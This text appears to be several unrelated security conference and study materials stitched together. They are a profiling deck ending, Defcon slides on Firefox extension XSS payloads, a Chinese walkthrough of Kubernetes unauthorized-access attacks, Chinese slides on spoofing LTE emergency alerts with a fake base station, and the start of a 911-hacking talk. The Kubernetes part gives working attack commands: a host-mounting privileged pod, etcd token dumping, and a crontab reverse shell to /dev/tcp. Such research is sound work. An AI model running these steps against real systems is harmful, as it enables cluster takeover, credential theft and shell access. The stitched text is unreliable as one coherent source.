Rights Reserved In Short… » Analysis Suggestions – Attempting to better understand your threats can increase your awareness of your network and protection needs – Defining your assets and valuables can identify possible threats – Studying non-cyber based criminal case studies can: • Increase your ability to correlate events with more insight • Studying more Criminal Case Studies can augment experience – Cyber Crimes – Serial Murders – Habitual Offenders • Provide you with understandings of resources and tools not commonly available to Security Programs – Keep up to-date on latest exploits and trends… – Maintain an active record of your environment – Be aware of what your network behavior Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Resources » Online (tools and references) – http://www.honeynet.org – http://www.crimelibrary.com – http://www.ists.dartmouth.edu – http://en.wikipedia.org/wiki/Offender_profiling – http://en.wikipedia.org/wiki/List_of_criminology_topics » Publications (just a tip of the ice berg) – Cyber Adversary Characterization • ISBN 978-1931836111 – Profiling Violent Crimes • ISBN 0-7619-2593-7 – Offender Profiling and Crime Analysis • ISBN 1-903240-21-2 » Physical References – Talk with Criminal Justice and Criminal Science academics Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Famous Dead Guy Quotes What enables an intelligent leader (intrusion analysts) to overcome others (cyber-criminals) is foreknowledge. All matters require foreknowledge Sun Tzu The Art of War The price one pays for pursuing any profession or calling is an intimate knowledge of its ugly side. James Baldwin (1924-1987) Copyright ©2007 Savid Technologies, Inc. All Rights Reserved Any Questions? sbodmer@savidtech.com
Abusing Firefox Extensions Defcon17– US, Las Vegas Roberto Suggi Liverani Nick Freeman WTF Are We?  Roberto Suggi Liverani  Senior Security Consultant – Security-Assessment.com  OWASP NZ Leader  http://malerisch.net  Nick Freeman  Security Consultant – Security-Assessment.com  http://atta.cked.me  Contact us  Roberto.suggi@security-assessment.com  Nick.freeman@security-assessment.com Agenda  Introduction  Security threats and risks  Disclosure summary  Abusing Extensions – a selection of exploits and demos Introduction  What are Firefox extensions?  It‟s just software  Equivalent of ActiveX  What extensions do?  Extend, modify and control browser behaviour  Provides extended/rich functionality and added features  Different type of Firefox addons  Extensions  Plugins (Search Engine plugins) and Themes 5 XUL: - provides UI to extensions - combined with JavaScript, CSS, HTML elements -.xul file XBL: - allows creation of new widgets - combined with CSS, XML and XUL XPConnect: - middle layer allows JavaScript to interface with XPCOM XPCOM: - reusable components/interfaces - interact with low layer libraries: network, I/O, file system, etc. Chrome: – privileged browser zone – code fully trusted Extension Security Model  Mozilla extension security model is nonexistent  Extension code is fully trusted by Firefox  Vulnerability in extension code might result in full system compromise  No security boundaries between extensions  An extension can silently modify/alter another extension  XPCom C++ components subject to memory corruption  Extensions vulnerabilities are platform independent  Lack of security policies to allow/deny Firefox access to internal API, XPCom components, etc  Any Mozilla application with the extension system is vulnerable to same class of issues (e.g. Thunderbird) The potential  Statistics – Firefox Browser Market Share  Beyond 20% globally since November 2008, more than 50% in certain regions/countries  Source: Marketshare - marketshare.hitslink.com Extension downloads boom  Statistics – AMO (Addons.Mozilla.Org) Download Trend  1 billion extension downloads from AMO – Nov 2008 Extensions are everywhere Search engines Social Networks Services Software/OS/Web Application Package Extensions Portals Google Toolbar Google Browser Sync Yahoo Toolbar Ask.com Toolbar Del.icio.us Extension Facebook Toolbar AOL Toolbar LinkedIn Browser Toolbar Netcraft Anti- Phishing Toolbar PhishTank SiteChecker Skype AVG Ubuntu LiveLink (OpenText) AMO (addons mozilla org) Mozdev Xulplanet The weakest part of the chain  Human Factors - users:  Trust  AMO Recommended Extensions  Open Source  Misconception = users expect extensions to be safe  'according to Softpedia, it's 100% safe„  NoScript/AdBlockPlus provides false sense of security  chrome:// URI whitelisted on NoScript, any XSS injection there is not blocked The weakest part of the chain ctd.  Human Factors – developers:  The Mozilla page for building extensions doesn't mention the word 'security' once  Many addon developers do it for a hobby – not necessarily aware of how dangerous a vulnerable extension can be  Human Factors – reviewers:  Don‟t need to have great knowledge about app / webapp security  Need to follow a few guidelines for what is and isn‟t acceptable  These guidelines focus on finding malicious extensions  Vulnerable extensions can quite easily slip through Concerns on AMO  Everyone can write an extension and submit it to AMO (even us :)  AMO review process lacks complete security assessment  Few extensions are signed in AMO. Extensions are generally not “signed”. Users trust unsigned extensions.  Experimental extensions (not approved yet) are publicly available Extension And Malware  Some people have already exploited this concept:  FormSpy - 2006  Downloader-AXM Trojan, poses as the legitimate NumberedLinks 0.9 extension  Steal passwords, credit card numbers, and e-banking login details  Firestarterfox - 2008  Hijacks all search requests through multiple search engines and redirects them through Russian site thebestwebsearch.net  Vietnamese Language Pack - 2008  Shipped with adware because the developer was owned  Might happen in the near future…  Malware authors bribe/hack famous/recommended extension developer/vendor  Initial benign extension, malware is introduced in an 3rd/4th update Abusing Firefox Extensions  Finding bugs in Firefox extensions is fun ;-)  Multiple ways to find them – it depends on:  Nature of the extension  Logic exposed  Input and output  XPCOM components  Third party API/components  Our research focus:  Extension logic, security model and functions exposed  Extension data flow and data injection points XSS or Cross Browser Context  XSS on steroids  Any input rendered in the chrome is a potential XSS injection point  XSS in chrome is privileged code!  It can interface with XPConnect and XPCOM = 0wn3d!  No SOP restrictions!  Cannot be blocked by NoScript! NoScript’s Whitelist XSS disclosing /etc/passwd Testing for XSS  Run Firefox with console active  firefox.exe -console  To confirm execution of our XSS payload, generate an error into console – dump(error);  Is our XSS in Chrome? Check all window properties - not just window Useful XSS payloads  Check if nsIScriptableUnescapeHTML.parseFragment() is used  Lack of this might mean use of input black-list filters Method Description Payload iframe with data URI and base64 payload <iframe src = „data:text/html;base64,base64XSSpayloadhere‟> Recursive iframes <iframe src = “data:text/html,<iframe src = „data:text/html;base64,base64iframe+data+XSSpa yload‟> </iframe”></iframe> Embedded XSS <embed src=„javascript:XSSpayload‟> XSS on DOM events <img src=„a‟ onerror=XSSpayload> XUL injection <![CDATA[“<button id=“1” label=“a” oncommand=„alert(window)‟ />”]]> XBL injection style=“-moz-binding:url(data:text/xml;charset=utf- 8,XBL)” Tools  Firebug – provides console, monitor and debugging features  Chromebug – Firebug for chrome, XUL  WebDeveloper – allows more control on page elements, cookies  XPComViewer – shows registered XPCOM components/interfaces  Venkman - JavaScript Debugger  Console2 – advanced error console  ChromeList – File viewer for installed extensions  Execute JS - enhanced JavaScript-Console  DOM Inspector – allows inspecting the DOM  Burp – web proxy  Mozrepl – js shell via telnet service  Sysinternals Tools – regmon, filemon, tcpmon, etc.  Total number of downloads from AMO: 30,000,000+ Abusing extensions… Extension Name Date Disclosed Vendor Response Date Fix Date WizzRSS 2009/02/18 2009/02/18 2009/03/20 CoolPreviews 2009/03/05 No response, silently fixed 2009/04/20 FireFTP N/A N/A 2009/02/19 Undisclosed 2009/02/16 2009/02/16 N/A Feed Sidebar 2009/03/04 2009/03/05 2009/03/14 Undisclosed 2009/02/27 N/A N/A UpdateScanner 2009/06/08 2009/06/11 2009/06/15 Undisclosed 2009/06/22 N/A N/A Undisclosed 2009/06/30 2009/06/30 2009/07/06 ScribeFire 2009/07/10 2009/07/15 2009/07/20 Skype N/A N/A 2009/06/03 Skype  Skype (<=  Issue:  Automatic arbitrary number of calls to arbitrary phone numbers and skypenames  Function skype_tool.call() is exposed to DOM and can be called directly  Skype username injection - skypeusername%00+\"  Filtering/Protection:  None.  Exploit:  Automatic arbitrary phone call to multiple numbers Demo  Demo.avi  Arbitrary phone calls CoolPreviews  CoolPreviews – 2.7  Issue:  URI is passed to the CoolPreviews Stack without any filtering.  A data: URI is accepted and its content is rendered in the chrome privileged zone.  User triggers exploit by adding the malicious link to the CoolPreviews stack (right-click by default)  Filtering/Protection:  No use of URI whitelist  Exploit:  data:text/html,base64;payloadbase64encoded Demo  Remote Code Execution Payload – invoking cmd.exe Update Scanner  Update Scanner (<3.0.3)  Issue:  Updated content is rendered within a chrome privileged window.  Malicious site inserts new payload and that is rendered when the user looks at the site changes from the Update Scanner window  Filtering/Protection:  <script> is ignored  Exploit:  XSS via event handler : <img src=a onerror=„evilpayload‟> Demo  Compromising NoScript – whitelisting malicious site FireFTP  FireFTP (<1.1.4)  Issue:  HTML and JavaScript in a server‟s welcome message is evaluated when connecting to an FTP server.  The code is executed in the chrome privilege zone  Filtering/Protection:  None.  Exploit:  Local File Disclosure Demo  Local File Disclosure Feed Sidebar  Feed Sidebar (<3.2)  Issue:  HTML and JavaScript in the <description> tags of RSS feeds is executed in the chrome security zone.  JavaScript is encoded in base64 or used as the source of an iframe and executed when the user clicks on the malicious feed item.  Filtering/Protection:  <script> tags are stripped  Exploit:  &lt;iframe src=&quot;data:text/html;base64,base64encodedjavascript&quot;&gt;& lt;/iframe&gt; Demo  Password stealing ScribeFire  ScribeFire (<3.4.3)  Issue:  JavaScript in DOM event handlers such as onLoad is evaluated in the chrome privileged browser zone.  Drag & dropping a malicious image into the blog editor executes the JavaScript.  Filtering/Protection:  No protection for DOM event handlers.  Exploit:  <img src=„http://somewebsite.tld/lolcatpicture.jpg‟ onLoad=„evilJavaScript‟> Exploit  Reverse VNC Using XHR – contents of payload Security Disclosure  Security disclosure is a new process to extension developers/vendors  Security is underestimated/not understood.  Few posts regarding security vulnerabilities in Firefox extensions in sec mailing-lists as Full Disclosure.  Mozilla security team can now be queried for bugs found in extensions Recommendations  Developers:  Follow OWASP developer‟s guide  Read code of similar extensions for ideas on avoiding common bugs  Security professionals:  Adhere to the OWASP testing guide and our presentation  Watch for publications for new ideas on breaking extensions  End-users:  Don‟t trust extensions!  Changelogs of security issues / Bugzilla  Updating addons (after checking the above)  Consider Safe Mode (disable all extensions)  Thanks! (buy us a beer!) Roberto.suggi@security-assessment.com Nick.freeman@security-assessment.com References  Research and publications on the topic  Extensible Web Browser Security - Mike Ter Louw, Jin Soon Lim, and V.N. Venkatakrishnan  http://www.mike.tl/view/Research/ExtensibleWebBrowserSecur ity  Bachelor thesis on Firefox extension security - Julian Verdurmen  http://jverdurmen.ruhosting.nl/BachelorThesis-Firefox- extension-security.html  Attacking Rich Internet Applications (kuza55, Stefano Di Paola)  http://www.ruxcon.org.au/files/2008/Attacking_Rich_Internet_A pplications.pdf References  Firebug – Petko. D. Petkov, Thor Larholm, 06 april 2007  http://larholm.com/2007/04/06/0day-vulnerability-in-firebug/  http://www.gnucitizen.org/blog/firebug-goes-evil/  Tamper Data XSS - Roee Hay – 27 jul 2008  http://blog.watchfire.com/wfblog/2008/07/tamper-data-cro.html  GreaseMonkey – ISS – 21 Jul 2005  http://xforce.iss.net/xforce/xfdb/21453  Sage RSS Reader (pdp & David Kierznowski)  http://www.gnucitizen.org/blog/cross-context-scripting-with- sage/
2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 1/20 介绍 k8s全称kubernetes,是一个由google开源的,用于自动部署,扩展和管理容器化应用程序的开源系统。通过k8s可跨多台主机进行容器编排、快速按需扩展容器化应用及其资源、 对应用实施状况检查、服务发现和负载均衡等。 组件介绍 如图所示,k8s集群由主控节点(Master node,以下简称master)和工作节点(Worker Node,以下简称node)组成: master节点负责资源调度,调度应用,维护状态和应用扩容等。 node节点上跑着应用服务,每个Node节点有一个kubelet,负责node与master之间的通信。 Master node组件 1. APIserver集群统一入口,以restful方式,交给etcd存储。用户端一般通过kubectl命令行工具与kube-apiserver进行交互。 2. .Controller-manager 处理集群中常规后台任务,通常一个资源对应一个控制器。 3. Scheduler 节点调度,选择node节点应用部署,负责决定将Pod放在哪个Node上。会对各个节点的负载、性能、数据考虑最优的node。 4. Etcd 存储系统,用于保存集群中相关的数据。 Worker node组件 1. Kubelet Master派到node节点的agent,管理本机容器的各种操作。 2. Kube-proxy 提供网络代理,用来实现负载均衡等操作。 3. Pod 是k8s中的最小部署单元,一组容器的集合,一个pod中的容器是共享网络的。主要是基于docker技术来搭建的。 用户端命令下发通常流程如下: (1)客户端根据用户需求,调用kube-apiserver相应api; (2)kube-apiserver根据命令类型,联动master节点内的kube-controller-manager和kube-scheduler等组件,通过kubelet进行下发新建容器配置或下发执行命令等给到对应 node节点; (3)node节点与容器进行交互完成下发的命令并返回结果; (4)master节点最终根据任务类型将结果持久化存储在etcd中。 安全机制 访问k8s集群的时候,需要经过三个安全步骤完成具体操作。过程中都要经过apiserver,apiserver做统一协调。 第一步 认证,判断用户是否为能够访问集群的合法用户。 第二步 鉴权,通过鉴权策略决定一个API调用是否合法。 第三步 准入控制,就算通过了上面两步,客户端的调用请求还需要通过准入控制的层层考验,才能获得成功的响应。大致意思就是到了这步还有一个类似acl的列表,如果列表有请 求内容,就通过,否则不通。它以插件的形式运行在API Server进程中,会在鉴权阶段之后,对象被持久化etcd之前,拦截API Server的请求,对请求的资源对象执行自定义(校 验、修改、拒绝等)操作。 序号 认证方式 认证凭据 1 匿名认证 Anonymous requests 2 白名单认证 BasicAuth认证 3 Token认证 Webhooks、ServiceAccount Tokens、OpenID Conne ct Tokens等 4 X509证书认证 匿名认证一般默认是关闭的。 白名单认证一般是服务启动时加载的basic用户配置文件,并且通常没有更多设置的话basic认证仅仅只能访问但是没有操作权限。 token认证更涉及到对集群和pod的操作,这是我们比较关注的。 X509证书认证是kubernetes组件间内部默认使用的认证方式,同时也是kubectl客户端对应的kube-config中经常使用到的访问凭证,是一种比较安全的认证方式。 当API Server内部通过用户认证后,就会执行用户鉴权流程,即通过鉴权策略决定一个API调用是否合法,API Server目前支持以下鉴权策略 序号 鉴权方式 描述 1 Always 当集群不需要鉴权时选择AlwaysAllow 2 ABAC 基于属性的访问控制 3 RBAC 基于角色的访问控制 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 2/20 4 Node 一种对kubelet进行授权的特殊模式 5 Webhook 通过调用外部REST服务对用户鉴权 Always策略光看描述就知道,生产环境中必定不会存在。 ABAC虽然功能强大,但是难以理解且配置复杂已经被RBAC替代。 RBAC是目前k8s中最主要的鉴权方式。 而Node鉴权策略主要是用于对kubelet发出的请求进行访问控制,限制每个Node只访问它自身运行的Pod及相关Service、Endpoints等信息。 当RBAC无法满足某些特定需求时 候,可自行编写鉴权逻辑并通过Webhook方式注册为kubernetes的授权服务,以实现更加复杂的授权规则。 RBAC、角色、账号、命名空间 RBAC,基于角色的访问控制(Role-Based Access Control)在RBAC中,权限与角色相关联,用户通过成为适当角色的成员而得到这些角色的权限。这就极大地简化了权限的管 理。这样管理都是层级相互依赖的,权限赋予给角色,而把角色又赋予用户 在k8s中,只有对角色的权限控制,访问主体都必须通过角色绑定,绑定成k8s集群中对应的角色,然后根据绑定的角色去访问资源。而每种角色又只能访问它所对应的命名空间中的 资源。 k8s支持多个虚拟集群,它们底层依赖于同一个物理集群。这些虚拟集群被称为命名空间(namespace)。 每个k8s资源只能在一个命名空间中。命名空间是在多个用户之间 划分集群资源的一种方法 命名空间->该空间绑定的系统角色 系统默认4个命名空间: default--没有指明使用其它名字空间的对象所使用的默认名字空间 kube-system-- Kubernetes 系统创建对象所使用的名字空间 kube-public--此命名空间下的资源可被所有人访问(包括未授权用户) kube-node-lease--集群之间的心跳维护 RBAC中一直强调角色,这里角色也分为两种,一种是普通角色role,一种是集群角色clusterrole。普通角色role用于平常分配给运行的容器,而集群角色更多承担管理工作 kubectl get ns #查看命名空间 查看普通角色,没有特别指明的话查看都是在default空间中。没有配置的话默认没有 kubectl get role #查看普通角色 指定kube-system空间,可以看到很多系统自带的角色 kubectl get role kube-system 集群角色。集群角色在default和kube-system中都是一样的 kubectl get clusterrole 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 3/20 集群中有个最高权限角色cluster-admin,它的拥有集群所有资源的所有权限。因此如果访问主体绑定到该角色的话,就会引发很大的安全问题 kubectl describe clusterrole cluster-admin -n kube-system 普通的admin权限也比较大,但是比起cluster-admin还是差了太多 kubectl describe clusterrole admin -n kube-system 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 4/20 常见的命令 绑定账号: 比如在集群范围将cluster-admin ClusterRole授予用户user1,user2和group1 kubectl create clusterrolebinding cluster-admin --clusterrole=cluster-admin --user=user1 --user=user2 --group=group1 给服务账号绑定角色 kubectl create clusterrolebinding default-admin --clusterrole=cluster-admin --serviceaccount=kube-system:default 查看所有节点 kubectl get nodes 查看secret kubectl get secret 查看系统的kubeconfig (查看当前的用户认证) kubectl config view 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 5/20 列出当前命名空间下的所有 services kubectl get svc 查看某个service的详细信息 kubectl describe svc kubernetes 切换用户 kubectl config use-context klvchen@kubernetes secret存储token查询 kubectl describe secret 获取指定secret的token (账号名在-token前,就叫default) kubectl describe secret default-token-8h165 -n kube-system 获取管理员用户 kubectl get clusterrolebinding -n kube-system 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 6/20 k8s攻击 未授权访问 未授权访问端口 功能 利用方式 6443,8080 kube-apiserver 未授权访问获取kube-system的token,通过kubectl使用kube-system的token获取pod列表。之 后可进一步创建pod或控制已有pod进行命令执行等操作。 10250,10255 kubelet kubeletctl批量获取pod等信息,尝试获取pod内/var/run/secrets/kubernetes.io/serviceaccou n/的token 2379 etcd 导出全量etcd配置,获取k8s认证证书等关键信息,进而通过kubectl创建恶意pod或控制已有po d,后续可尝试逃逸至宿主机 30000以上 dashboard 配置问题导致可跳过认证进入后台 2375 docker Docker daemon默认监听2375端口且未鉴权,我们可以利用API来完成Docker客户端能做的所有 事情。 kube-apiserver未授权 6443和8080端口区别 1)本地主机端口 HTTP服务 默认端口8080,修改标识–insecure-port 默认IP是本地主机,修改标识—insecure-bind-address 在HTTP中没有认证和授权检查 主机访问受保护 2)Secure Port 默认端口6443,修改标识—secure-port 默认IP是首个非本地主机的网络接口,修改标识—bind-address HTTPS服务。设置证书和秘钥的标识,–tls-cert-file,–tls-private-key-file 认证方式,令牌文件或者客户端证书 使用基于策略的授权方式 这两个端口同利用方式,只要其中一个端口没做auth 8080端口访问如下,没做auth会直接列出API列表 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 7/20 6443需要https访问 (这里目标做了需要auth才能访问则会出现:system:anonymous) 查看kube-system命名空间下的所有token,GET:/api/v1/namespaces/kube-system/secrets/ 查看所有容器(pods),GET:/api/v1/namespaces/default/pods?limit=500 查看token 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 8/20 所有容器查询 三种利用方式: 1. 请求对应的API接口创建pods执行命令 (允许匿名访问) 2. 利用kubectl (利用token验证,或者允许匿名访问) 3. 利用dashboard界面创建pods (如果存在dashboard,访问/ui就会跳转到) API请求接口 创建特权容器,POST:/api/v1/namespaces/default/pods {"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":" {\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test-4444\",\"namespace\":\"default\"},\"spec\":{\"containers\": [{\"image\":\"nginx:1.14.2\",\"name\":\"test-4444\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\": {\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test-4444","namespace":"default"},"spec":{"containers": 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 9/20 [{"image":"nginx:1.14.2","name":"test-4444","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath": {"path":"/","type":"Directory"},"name":"host"}]}} 这里我已经创建过test-4444,下图创建的是joker 执行命令,GET:/api/v1/namespaces/default/pods/test-4444/exec?stdout=1&stderr=1&tty=true&command=whoami 在用PostMan测试第三条执行命令的时候我出现了"Upgrade request required"(400) { "kind": "Status", "apiVersion": "v1", "metadata": {}, "status": "Failure", "message": "Upgrade request required", "reason": "BadRequest", "code": 400 } 经过查询发现: 对于websocket连接,首先进行http(s)调用,然后是使用HTTP Upgrade标头对websocket的升级请求。 curl/Postman不支持从http升级到websocket。因此错误。 解决办法就是用wscat工具发送包 wscat -n -c '' (但是我这里不知道是不是由于8080端口的问题,wscat请求返回为空) kali的wscat有毛病,必须把http/https换成ws 否则会出现下面错误 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 10/20 找别人测的 接口利用基本就这些,kubectl利用则如下 首先是不使用token看看能不能连的上 kubectl -s <IP>:<PORT> <COMMAND> 利用token连接 (一般用不上,除非不用token连接失败或者用于6443端口验证或者用于dashboard验证) kubectl -s <IP>:<PORT> --kubeconfig-token get pods 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 11/20 这里kubectl有个坑,版本必须对应上。否则会出现以下错误 Error from(Not Acceptable) 这里用到的是v1.8.7 利用kubectl直接获取pod shell kubectl get pods #获取所有容器 kubectl -s <IP>:<PORT> --namespace=default exec -it <pods_name> bash kubectl创建pod myapp.yaml apiVersion: v1 kind: Pod metadata: name: myapp spec: containers: - image: nginx name: container volumeMounts: - mountPath: /mnt name: test-volume volumes: - name: test-volume hostPath: path: / the command: kubectl create -f /home/kali/Desktop/myapp.xml 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 12/20 向容器的 /mnt/etc/crontab 写入反弹 shell 的定时任务,因为创建容器时把宿主机的根目录挂载到了容器的/mnt 目录下,所以可以直接影响到宿主机的 crontab (和docker一样的逃逸方法) echo -e "* * * * * root bash -i >& /dev/tcp/ip/port 0>&1\n" >> /mnt/etc/crontab 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 13/20 利用dashboard 访问路径:/ui会跳转到/api/v1/proxy/namespaces/kube-system/services/kubernetes-dashboard/#!/workload?namespace=default 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 14/20 有些需要验证登录的则如下图 上传json (内容是刚刚那个yaml) 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 15/20 比较新的kubernetes是可以直接编辑创建的 fofa没找到未授权的kubernetes,利用方式差不多。也是新建一个pod然后在UI里访问利用 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 16/20 Etcd未授权访问 Etcd是Kubernetes集群中的一个十分重要的组件,是兼具一致性和高可用性的键值数据库,用于保存集群所有的网络配置和对象的状态信息。通常我们用etcd来存储两个重要服 务: 网络插件flannel kubernetes本身,包括各种对象的状态和元信息配置 其默认监听了2379等端口,如果2379端口暴露到公网,可能造成敏感信息泄露。 访问https://IP:2379/v2/keys,有内容,类似{"action":"get","node":{"dir":true}} 这样的,就确定存在未授权访问 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 17/20 Etcd v2和v3是两套不兼容的API,K8s是用的v3,所以需要先通过环境变量设置API为v3 攻击机从 https://github.com/etcd-io/etcd/releases/ 下载 得到etcdctl。通过如下命令可以遍历所有的key: ETCDCTL_API=3 ./etcdctl --endpoints=http://IP:2379/ get / --prefix --keys-only 如果服务器启用了https,需要加上两个参数忽略证书校验 --insecure-transport 和--insecure-skip-tls-verify 通过v3 API来dump数据库到 output.data ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379/ get / --prefix --keys-only | sort | uniq | xargs - I{} sh -c 'ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379 get {} >> output.data && echo "" >> output.data' 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 18/20 从导出的文件里搜关键字ca.crt。根据对应的namespace和token来进行访问 有这个token就可以走6443端口访问了 kubectl --insecure-skip-tls-verify -s --token="<namespace对应的token>" -n <namespace> get pods 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 19/20 我这里6443出现下面的错误。。8080就可以 Error from server (Forbidden): User "system:serviceaccount:kube-system:default" cannot list pods in the namespace "kube-system". (get pods) 拿到token后跟之前一样创建test_config控制集群 Kubectl Proxy命令未安全使用 k8s server执行 设置API server接收所有主机的请求: kubectl --insecure-skip-tls-verify proxy --accept-hosts=^.*$ --address= --port=8009 之后就可以通过特定端口访问k8s集群 kubectl -s get pods -n kube-system 参考链接: https://buaq.net/go-98824.html http://f5.pm/go-103737.html https://www.kingkk.com/2020/03/Kubernetes%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5%E5%92%8C%E4%B8%80%E4%BA%9B%E6%9C%AA%E6%8E%88%E6 https://github.com/zj1244/Blog/issues/6 https://www.jianshu.com/p/e443b3171253 2022/3/17 16:07 Evernote Export file:///C:/Users/jiushi/Desktop/k8s未授权.html 20/20 https://kubernetes.io/zh/docs/reference/kubectl/cheatsheet/ https://blog.51cto.com/hequan/2406680 https://blog.csdn.net/BigData_Mining/article/details/88529157
警告:10级地震将在一分钟内发生 李伟光 weelight.li@gmail.com ! 360 独角兽团队 演讲内容 01 关于公共预警系统与LTE网络 02 LTE协议中的漏洞 03 触发漏洞 a. 搭建一个伪基站 b. 伪造虚假的预警消息 04 结论! 01 公共预警系统与LTE网络 针对这些灾害对公众发出警告信息 PWS警告系统遍布全球 ETWS KPAS EU-ALERT CMAS •  2018年1月的夏威夷导弹警报 新闻 •  2018年1月的夏威夷导弹警报 新闻 02 LTE协议中的漏洞 LTE协议中的漏洞 1.  目前的标准中并未加入对警报信息的签名等验证信息. 2.  手机在进行小区重选的时候,如果没有触发位置区更新流程(TAU), 手机是不会对基站的合法性进行甄别! ! Attack!vector 03 触发漏洞 如何搭建一个LTE伪基站 USRP!B210 ThinkPad! srsLTE!/srsENB 硬件 软件 使之像正常基站一样工作 获取当前合法基站的配置参数 在srsENB平台上进行配置 用于发现LTE网络的应用软件 srsLTE配置文件 PWS!Message's!Carrier—System!Information!Block SIB(Type(1( SIB!scheduling!information SIB(Type(2( Common!and!shared!channel! information SIB(Type(3( Cell!re-selection!information! SIB(Type(4( Cell!re-selection!information! intra-frequency!neighbor! information SIB(Type(5( Cell!re-selection!information! Intra-frequency!neighbor! information SIB(Type(6( Cell!re-selection!information! for!UTRA SIB(Type(7( Cell!re-selection!information! for!GERAN SIB(Type(8( Cell-re-selection!information! for!CDMA2000 SIB(Type(9( Home!eNB!identifier SIB(Type(10( ETWS!primary!notification! (Japan) SIB(Type(11( ETWS!Secondary!Notification! (Japan) SIB(Type(12( EU-Alert!(Europe)! KPAS!(South!Korea)! CMAS!notification(USA)! 伪造ETWS警报消息 警报消息的四个主要部分 •  SIB!10!:第一级警报信息(直接携带警报消息) •  SIB!11!:第二级警报信息(直接携带警报消息) •  Paging!:向用户手机提示有警报消息需要接收 •  SIB!1:!SIB 1负责对SIB10以及SIB11的调度 ETWS第一级警报信息 •  ETWS第一级警报信息中不能包含某些特定的消息内容. 发送ETWS第一级警报信息的主要源代码 虚假地震预警演示 •  自定义内容 •  ETWS第二级警报信息支持消息细分 •  它支持GSM-7和UCS-2字符编码标准 ETWS第二级警报信息 ETWS第二级警报信息 发送ETWS第二级警报信息的源代码 不仅仅是警告信息 •  将消息标识符设置为0x1104而不是0x1102 •  没有响亮的警报声,只是温和的铃声 •  警告邮件可伪装成垃圾邮件,其中可能包含广告,网上诱骗网 站或欺诈邮件 Google Pixel实验演示 (a)英文地震警告信息 (b)中文地震警告信息 (c)包含钓鱼网站链接的垃圾邮件 (d)包含诈骗电话的垃圾邮件 (a)! (b)! (c)! (d)! 网络钓鱼警告消息演示 iPhone实验演示 l  由于PWS不是所有国家的强制性规范,不同型 号的手机可能会有不同的反应. l  我们测试的iPhone不响应主ETWS警告消息,但 它可以响应辅助ETWS警告消息. l  国行版的苹果手机也仅在MCC为001,MNC为01的 测试网络中对警报信息作出响应 iPhone’s!Response iPhone的实验演示 结论 风险 &缓解 潜在风险 警告:一分钟后将发生10级地震 接下来会发生什么? 这会造成巨大的恐慌,甚至发生踩踏事件,造成难以想象的 后果 减轻危害 •  验证虚假基站的真实性 1.防止手机接入伪基站,在满足了小区重选准则后, 手机还要通过判断广播消息的中的数字签名。数字签 名是由网络侧的私钥进行计算并且添加到广播消息中 的。 2.仅仅在接收到pws消息的时候进行验证,同样时候 使用非对称加密的方式。 减轻危害 Network(signs(the(PWS(messages Security)Algorithm Security)Algorithm K-SIG K-SIG System)Info System)Info Time)Counter Time)Counter System)Info System)Info Digital) Signature Digital) Signature Protected)System)Info LSBs)of)Time) Count LSBs)of)Time) Count Q/A(( Thank(You(
Hacking 911: Adventures in Disruption, Destruction, and Death quaddi, r3plicant & Peter Hefley August 2014 Jeff Tully Christian Dameff Peter Hefley Physician, MD Emergency Medicine Physician, MD Pediatrics IT Security, MSM, C|CISO, CISA, CISSP, CCNP, QSA Senior Manager, Sunera Jeff Tully Christian Dameff Peter Hefley Open CTF champion sudoers- Defcon 16 Speaker, Defcon 20 Wrote a program for his TI-83 graphing calculator in middle school Speaker, Defcon 20 Gun hacker, SBR aficianado This talk is neither sponsored, endorsed, or affiliated with any of our respective professional institutions or companies. No unethical or illegal practices were used in researching, acquiring, or presenting the information contained in this talk. Do not attempt the theoretical or practical attack concepts outlined in this talk. Disclaimer Outline - Why This Matters (Pt. 1) - 911 Overview - Methodology - Attacks - Why This Matters (Pt. 2) Why This Matters (Pt. 1) 4/26/2003 9:57pm Emergency Medical Services (EMS) Research Aims • Investigate potential vulnerabilities across the entire 911 system • Detail current attacks being carried out on the 911 system • Propose solutions for existing vulnerabilities and anticipate potential vectors for future infrastructure modifications Methodology • Interviews • Regional surveys • Process observations • Practical experimentation • Solution development Wired Telephone Call End Office Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice Voice + ANI Voice + ANI ANI ALI Wireless Phase 1 Telephone Call Mobile Switching Center Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice Voice + pANI/ESRK 